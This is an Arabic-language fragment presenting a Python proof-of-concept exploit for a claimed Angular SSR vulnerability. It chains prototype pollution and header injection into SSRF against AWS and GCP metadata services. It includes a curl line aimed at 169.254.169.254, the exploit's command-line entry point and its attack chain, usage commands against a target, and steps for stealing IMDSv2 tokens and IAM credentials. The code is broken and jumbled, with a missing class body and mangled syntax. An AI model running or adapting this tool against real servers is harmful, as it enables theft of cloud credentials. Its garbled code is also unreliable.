
Python PoC يستغل CVE-2026-27739 في Angular SSR: حقن الترويسات عبر تلوث النموذج الأولي (prototype pollution) وتسلسل SSRF إلى AWS IMDS/بيانات GCP الوصفية لسرقة بيانات الاعتماد.
curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}
الوصف: يعالج Angular SSR معاملات استعلام غير آمنة تؤثر على سلسلة النموذج الأولي التأثير: التلاعب بترويسات الطلب، احتمال تسلسل SSRF
express-validator أو ما شابه لتعقيم الترويساتdef main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")
args = parser.parse_args()
exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)
print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")
# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()
if name == "main": main() الاستخدام bash
python3 angular_ssr_exploit.py https://target.com
python3 angular_ssr_exploit.py https://target.com --no-ssl-verify كيفية العمل اختبار حقن الترويسات: يرسل حمولات تلوث النموذج الأولي وترويسات forwarded غير الآمنة التي قد يعالجها Angular SSR بشكل غير آمن سلسلة SSRF: يختبر الوصول إلى AWS IMDS وبيانات GCP الوصفية وخدمات localhost عبر X-Forwarded-For/X-Original-URL استخراج رمز IMDSv2: يسلسل SSRF لسرقة رموز بيانات AWS الوصفية ثم بيانات اعتماد IAM التقارير الآلية: ينشئ تقرير اختبار اختراق مُقيَّم بـ CVSS مع إثباتات المفهوم التفاصيل التقنية السبب الجذري: غالبًا ما تمرر تطبيقات Angular Universal SSR ترويسات req.headers مباشرة إلى واجهات برمجة التطبيقات الداخلية دون تعقيم:
javascript
// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });